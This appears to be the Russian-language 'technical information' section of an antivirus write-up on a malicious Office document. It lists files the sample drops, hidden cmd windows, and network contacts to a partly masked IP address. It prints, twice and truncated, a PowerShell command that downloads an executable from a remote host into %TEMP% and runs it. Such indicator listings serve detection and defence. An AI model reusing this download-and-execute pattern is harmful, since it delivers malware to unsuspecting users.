Техническая информация
- $mbxku как %temp%\xzbzupsoox3.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function cejclbut8([String] $Mbxku){(New-Object System.Net.WebClient).DownloadFile($Mbxku,''%TEMP%\xzbzupsoox3.exe'');Start-Process ''%TEMP%\xzbzupsoox3.exe'';}try{...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1384
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\sfyraaxyy4.bat
- %TEMP%\722253.cvr
- '5.##9.255.4':80
- http://5.##9.255.4/you2.exe
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Sfyraaxyy4.bat" " (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function cejclbut8([String] $Mbxku){(New-Object System.Net.WebClient).DownloadFile($Mbxku,''%TEMP%\xzbzupsoox3.exe'');Start-Process ''%TEMP%\xzbzupsoox3.exe'';}try{... (со скрытым окном)